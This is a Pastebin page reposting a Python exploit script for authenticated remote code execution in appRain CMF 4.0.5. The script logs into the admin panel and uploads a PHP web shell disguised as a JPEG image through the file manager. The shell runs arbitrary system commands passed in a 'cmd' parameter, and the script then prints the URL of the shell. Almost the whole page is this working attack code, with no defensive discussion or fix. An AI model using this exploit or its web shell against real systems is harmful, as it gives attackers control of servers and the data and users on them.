API tools faq
paste
Advertisement
FlyFar

appRain CMF 4.0.5 - Remote Code Execution (RCE) (Authenticated)

FlyFar
Jun 8th, 2024
410
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.12 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. # Exploit Title: appRain CMF 4.0.5 - Remote Code Execution (RCE) (Authenticated)
  2. # Date: 04/28/2024
  3. # Exploit Author: Ahmet รœmit BAYRAM
  4. # Vendor Homepage: https://www.apprain.org
  5. # Software Link: https://github.com/apprain/apprain/archive/refs/tags/v4.0.5.zip
  6. # Version: latest
  7. # Tested on: MacOS
  8.  
  9. import requests
  10. import sys
  11. import time
  12. import random
  13. import string
  14.  
  15. def generate_filename():
  16. """ Generate a 5-character random string for filename. """
  17. return ''.join(random.choices(string.ascii_lowercase, k=5)) + ".inc"
  18.  
  19. def login(site, username, password):
  20. print("Logging in...")
  21. time.sleep(2)
  22. login_url = f"https://{site}/admin/system"
  23. session = requests.Session()
  24. login_data = {
  25. 'data[Admin][admin_id]': username,
  26. 'data[Admin][admin_password]': password
  27. }
  28. headers = {
  29. 'Content-Type': 'application/x-www-form-urlencoded'
  30. }
  31. response = session.post(login_url, data=login_data, headers=headers)
  32. if "Logout" in response.text:
  33. print("Login Successful!")
  34. return session
  35. else:
  36. print("Login Failed!")
  37. sys.exit()
  38.  
  39. def upload_shell(session, site):
  40. print("Shell preparing...")
  41. time.sleep(2)
  42. filename = generate_filename()
  43. upload_url = f"https://{site}/admin/filemanager/upload"
  44. files = {
  45. 'data[filemanager][image]': (filename, "<html><body><form method='GET'
  46. name='<?php echo basename($_SERVER['PHP_SELF']); ?>'><input type='TEXT'
  47. name='cmd' autofocus id='cmd' size='80'><input type='SUBMIT'
  48. value='Execute'></form><pre><?php if(isset($_GET['cmd'])){
  49. system($_GET['cmd']); } ?></pre></body></html>", 'image/jpeg')
  50. }
  51. data = {
  52. 'submit': 'Upload'
  53. }
  54. response = session.post(upload_url, files=files, data=data)
  55. if response.status_code == 200 and "uploaded successfully" in response.text:
  56. print(f"Your Shell is Ready: https://{site}/uploads/filemanager/{filename}")
  57. else:
  58. print("Exploit Failed!")
  59. sys.exit()
  60.  
  61. if __name__ == "__main__":
  62. print("Exploiting...")
  63. time.sleep(2)
  64. if len(sys.argv) != 4:
  65. print("Usage: python exploit.py sitename.com username password")
  66. sys.exit()
  67. site = sys.argv[1]
  68. username = sys.argv[2]
  69. password = sys.argv[3]
  70. session = login(site, username, password)
  71. upload_shell(session, site)
  72.            
Tags: Exploit CVE Vulnerability RCE appRain CMF
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!